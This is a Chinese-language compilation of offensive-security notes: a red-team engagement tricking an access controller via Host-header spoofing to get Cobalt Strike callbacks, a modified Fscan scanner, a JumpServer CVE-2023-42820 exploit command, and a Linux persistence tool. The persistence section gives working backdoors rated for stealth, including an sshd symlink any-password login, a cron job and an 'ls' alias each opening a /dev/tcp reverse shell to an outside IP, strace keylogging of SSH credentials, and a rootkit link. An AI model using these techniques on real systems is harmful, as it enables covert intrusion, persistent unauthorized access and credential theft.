Quan


WEB安全 内网安全 终端对抗 威胁情报
内网渗透
记一次供应链+社工技术通关某金融演练单位

精彩的地方在于 
1.如何最大化的利用云服务器资产来扩大攻击面
水坑钓鱼
2.如何在有AC的情况下,上线CS
简单的信息收集后,发现使用了某安全厂商的ac上网设备,pc终端输入账号密码通过ac认证后可以访问互联网,而限制用户能否访问目标网站,一般都是通过配置http host头白名单来实现。

试了下公司官网,http可以正常访问,所以cs listener中配置host为公司官网域名,成功http上线。


https://mp.weixin.qq.com/s/ThiChVEU_ub0U5m1fu3o0A
内网渗透
Fscan二开细节点

XiaoLi最近发了公众号,主要介绍了他二开Fscan的一些点,我觉得可以作为很好的参考:
• 1,删除一些少用的功能,例如:wmiexec,SSH命令执行,MS17 EXP,http/socks5 proxy等
    • 2,颜色检查,使用isatty自动检查即可,不再需要nocolor
    • 3,改进ICMP扫描流量 @9bie
    • 4,屏蔽掉一些没用的报错,例如Http扫描产生的 block error message like 'Unsolicited response received on idle HTTP channel starting with,MSSQL/MySQL/SSH爆破核心产生的错误
    • 5,代码结构优化,例如config.go
    • 6,SMB扫描,爆破重写(不在需要SMB2这个库),支持从445获取NTLM Info,并且与139端口信息获取做一些判断,445开启,则139只返回是否为域控信息,否则返回NTLM Info
    • 7,默认扫描结果文件名优化
    • 8,支持从RDP端口获取NTLM info
    • 9,重命名整个项目
    • 10,完整的IPv6支持 @jiushi
    • 11,SMB爆破,判断匿名用户,也就是常说的误报
    • 12,改进原来的扫描8位子网掩码的逻辑,默认遇到8位子网掩码,每24位只会扫描10个IP,从这开始优化,独立出网关扫描模式,并且脱离原来的逻辑
    • 13,还有一些其他杂项的优化,修修补补
    • 14,*SSH爆破问题还没解决


https://mp.weixin.qq.com/s?__biz=MzUyNzk2NDcwMw==&mid=2247488571&idx=1&sn=a02af76451d768dd34fe0f6851612a2c
内网渗透
内网代理

据说速度很快的内网渗透代理,不知道怎么样,回来学习一下。


https://github.com/ginuerzh/gost
内网渗透
JUMPER Server验证码计算工具

python CVE-2023-42820.py -t http://IP:Port -e email -u username


https://github.com/C1ph3rX13/CVE-2023-42820C1ph3rX13
内网渗透
Linux下权限维持工具-HackerPermKeeper

一直以来,可能更专注于Windows下的权限维持,对于Linux下的权限维持,则是非常不关注。
因此,聚焦于这款工具,看上去很牛逼
1.存在check.py,可以告知你可以使用哪些维权方式
2.维权的主程序,它可以帮助你自动维权。
以下是官方的介绍节选
OpenSSH后门万能密码&记录密码(这个需要依赖环境),就是把对方的门换个锁,但是原来的钥匙也可以使用
发现程度:||

PAM后门,PAM是一个Linux登录验证的认证服务,修改其中关于ssh登录的验证,添加一个万能密码,已经记录的账号密码位置(类似把对方房间内有内鬼)
发现程度:||


SSH软链接
cat /etc/ssh/sshd_config|grep UsePAM
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=8888
ssh root@xx.xx.xx.xx -p 8888 任意密码登录即可
发现程度:||||||


公私钥
使用密钥进行登录
发现程度:||||||


后门帐号
使用命令添加账号
发现程度:||||||


crontab后计划任务
1、编辑后门反弹
vim /etc/.111.sh

#!/bin/bash
sh -i >& /dev/tcp/192.168.86.137/3434 0>&1

chmod +x /etc/.111.sh

2、添加定时任务
vim /etc/crontab
*/1 * * * * root /etc/.1111.sh
发现程度:||||||


Strace后门
strace是一个动态跟踪工具,它可以跟踪系统调用的执行。
我们可以把他当成一个键盘记录的后门,来扩大我们的信息收集范围
可以记录ssh明文和密钥(登录的)和Rootkit配合一起
发现程度:||||

命令自定义-Alias后门
alias命令的功能:为命令设置别名
alias ls='alerts(){ ls $* --color=auto;bash -i >& /dev/tcp/192.168.86.137/3333 0>&1; };alerts'
执行ls就会反弹shell
持久化+隐藏:重启依旧生效
发现程度:||||

Rootkit后门
https://github.com/f0rb1dd3n/Reptile/releases/
Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。
发现程度:||
但是使用工具进行检测出来情况很大,建议看代码,手动编写此工具(难度很大)


history不记录执行命令
在输入命令时候,添加空格

ssh软链接&crontab
快速生成软链接[需要运行脚本成功后,一分钟连接],并且执行计划任务,每分钟判断当前软链接是否存在,如果被kill掉,就重新执行

|||||  越多,越容易发发现
||        越少,越难发现,但是部署起来,需要的依赖很多


https://github.com/RuoJi6/HackerPermKeeper